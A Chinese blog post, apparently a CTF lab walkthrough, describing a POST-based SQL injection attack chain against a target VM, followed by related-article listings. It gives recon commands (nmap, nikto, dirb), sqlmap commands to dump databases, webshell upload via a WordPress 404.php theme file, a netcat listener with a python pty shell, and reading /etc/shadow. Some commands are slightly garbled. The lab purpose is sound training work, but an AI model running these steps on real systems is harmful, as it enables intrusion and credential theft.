ctf—SQL注入(post)

最新推荐文章于 2024-05-16 02:47:32 发布
最新推荐文章于 2024-05-16 02:47:32 发布
阅读量1k 收藏 4
点赞数 2
分类专栏: CTF专题 文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57497184/article/details/118532877
版权

ctf—SQL注入(post)

SQL注入漏洞介绍

​ sql注入攻击指用用户构建特殊的输入作为参数传入web应用程序,通过执行sql语句,而执行攻击者所要的操作,主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。

​ 任何一个用户可以输入的位置都可以是注入点。比如url中,以及http报文中,post传递的参数

1.信息探测

扫描主机开放的全部端口

nmap -T4 -p -靶场IP

快速扫描主机全部信息

nmap -T4 -A -v 靶场IP

在这里插入图片描述

探测敏感信息

nikto -host http://靶场ip:端口

dirb http://靶场ip:端口
在这里插入图片描述

2.漏洞扫描

漏洞扫描器——Owasp-zap(功能强大,专注于web安全的漏洞扫描器)

3.漏洞利用

针对web进行漏洞扫描

对扫描的结果进行分析。注意,如果有sql注入漏洞,可以直接利用。但是扫描结果也不一定准确。

使用sqlmap利用SQL注入漏洞

sqlmap -r request.raw -level 5 -risk 3 -dbs -dbms mysql --batch

sqlmap -r request.raw -level 5 -risk 3 -D “数据库名” -tables 查看对应数据库中的数据表 --batch

sqlmap -r request.raw -level 5 -risk 3 -D “数据库名” -T “表名” -columns 查看对应的字段 --batch

sqlmap -r request.raw -level 5 -risk 3 -D “数据库名” -T"表名" -C“列名” -dump --batch

使用burp来抓取数据包
在这里插入图片描述在这里插入图片描述

sqlmap探测

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

4. 上传webshell获取控制权

wordpress后台寻找上传点

主题的404.php可以上传webshell

webshell获取 /usr/share/webshell/php/
在这里插入图片描述

在这里插入图片描述

上传webshell

在这里插入图片描述

上传webshell后,

启动监听 nc nlvp port

启动终端 python -c"import pty;pty.spawn(’/bin/bash’)"
在这里插入图片描述

在这里插入图片描述

5. root权限

使用cat/etc/shadow/ cat/etc/passwd 查看敏感文件

使用su- 提升root权限

YKingH
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF Web各种题目的解题姿势
07-27
课时1:SQL注入原理与利用 19'40 课时2:SQL注入宽字节原理与利用42'08 课时3:SQL Union注入原理与利用01'01'54 课时4:SQL注入布尔注入50'02 课时5:报错注入原理与利用29'27 课时6:CTF SQL基于约束注入...
CTF渗透训练环境(镜像,视频,虚拟机)
12-26
带靶机镜像,教学视频(SSH私钥泄露、SSH渗透root主机、SMB服务信息泄露、FTP服务后门利用、Sql-GET参数注入、Sql-POST参数之HTTP报文注入、Sql-X-Forwarded-For参数注入、SSI注入、路径遍历、暴力破解、命令执行、...
CTF-11.SQL注入post
woo233的博客
09-20 905
SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数;只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定正确。
详解 CTF Web 中的快速反弹 POST 请求
小水池
08-11 8364
目录 0x00 前言 0x01 Python Requests 安装并导入 requests 模块 发送 GET 请求与 POST 请求 查看请求头 查看响应头 查看响应内容 传递 GET 请求参数 传递 POST 请求参数 传递 Cookie 参数 会话对象 Session() 0x02 writeups 【实验吧 CTF】 Web —— 天下武功唯快不破 【Bugk...
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84968222的博客
05-16 785
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
[青少年CTF]POST&GET解题记录
qq_64868579的博客
06-04 861
青少年CTF训练平台:www.qsnctf.com博主用户名:Fourstar.题目介绍:题目描述:POST和GET是好兄弟,你能否通过这一关让POST和GET两个好兄弟见面呢?
网络安全Web学习记录———CTF---Web---SQL注入(GET和POST传参)例题
Zhiyilang的博客
12-13 2214
最开始学习CTF里的web方向时,每次做了题遇到类似的老是忘记之前的解法,所以写点东西记录一下。听大哥的话,就从最开始的GET传参开始吧!!!(大部分都是只得其法,不得其理。希望以后学了更多后能补充上原理)
CTF训练 web安全SQL注入(post)
梁辰兴的博客
10-24 1032
SQL注入攻击指的是用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据入侵系统。任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数。只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定正确。
国科大web安全中期CTF.pdf
11-22
常见的Web安全威胁包括SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。 二、 FLAG 的获取 在这篇文章中,我们将通过三个挑战来获取FLAG。 2.1FLAG获取之Base64编码 在第一个挑战中,我们需要通过 F12 查看...
CTF工具之antsword(web).rar
09-16
antsword的核心功能在于帮助参赛者发现并利用Web应用中的漏洞,比如SQL注入、XSS跨站脚本攻击、文件包含漏洞等。 antsword的主要特点包括: 1. **多平台支持**:antsword支持Windows、Linux和Mac OS等多个操作系统...
ctf编写
02-17
7. **Web安全**:Python可以用于构造SQL注入、XSS攻击的payload,`BeautifulSoup`库用于HTML解析,`scrapy`框架用于大规模网页抓取。 8. **取证分析**:Python可以读取日志文件、内存转储等,`pandas`库用于数据...
CTF-入门九
realstarstarli的博客
07-19 1188
CTF-入门九 这里继续bugku web的题解记录. 秋名山老司机 拿到这道题,告诉你们在两秒之内提交答案,手动肯定是不行的。 两秒内刷新是这样的页面,这里也可以知道是post方法传值 这里给出脚本,网上的脚本大同小异,这里按照惯例优化了一下代码并给出完整的代码注释 import requests from bs4 import BeautifulSoup #获取网页内容,并且提取<div>内容 ''' 通过我们对于题目的源代码的分析可知,在两秒内刷新页面会得到不一样的结果 这里其实是会话
CTFweb篇——GET&POST
suiyideAli的博客
09-21 2万+
0x00 前言 1. 首先使用BurpSuite 抓取一个http文件进行分析 2. 左边为请求信息,右边为响应信息;请求信息有三部分组成,分别为请求行、请求头、和请求正文组成。响应信息也有三部分组成,分别为响应行、响应 头、响应正文。 3. 首先可以看一下请求行 GET /index.php?tn=monline_3_dg HTTP/1.1 GET方法。GET方法用于获...
Bugku CTF-web4 POST型传参
weixin_44023403的博客
04-18 3658
前言:最近开始接触bugku,感觉适合新人培养兴趣。自己在学习的时候写个笔记,督促自己多去学习和巩固知识。如果文章和代码有表述不当之处,还请大佬不吝赐教。 Bugku CTF-web4 POST型传参知识积累解题总结 知识积累 HTTP的POST请求:向指定的资源提交要被处理的数据。 HTTP的POST请求方式:把提交的数据放在HTTP包的Body中。 解题 查看PHP代码,发现可用POST类型的HTTP来请求参数,构造报文头来传参 $what=$_POSTI'what'];//读取参数what
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4770
以pikachu靶场练习来学习ctf知识
ctf get post 传参 HackBar
热门推荐
weixin_44614983的博客
01-31 3万+
get和post是http协议的两种基本请求方式 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据 https://www.w3school.com.cn/tags/html_ref_httpmethods.asp 知乎上这篇更详细,关于get和post的区别 https://www.zhihu.com/question/28586791 web题中会遇到,比如...
WriteUp-CTF-Web
2201_75737040的博客
11-18 243
来源:攻防世界考点:php代码审计之弱类型比较工具:手工难度:⭐分析过程打开场景,分析代码构造payload:?
sql注入-post
weixin_45007073的博客
01-02 1251
CTF比赛的时候,sql注入算是比较常见的题型,今天来记录一下基于靶机的post注入。 准备工作 靶机下载: 链接:https://pan.baidu.com/s/1o8-25n0LtDTk2w_SgOT2og 提取码:zlqz 攻击过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用nmap进行主机服务检测 发现目标主机开放了80、8080等端口 使用nikto进行信息收集 nikto -host http://192.168.101.34
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4608
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
ctf中get和post
07-27
2. 注入攻击:通过POST请求向服务器提交恶意的数据,例如SQL注入、命令注入等。 3. 文件上传:通过POST请求提交恶意文件,利用文件上传漏洞进行攻击。 4. 跨站点脚本(XSS):通过GET或POST请求向服务器提交恶意脚本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值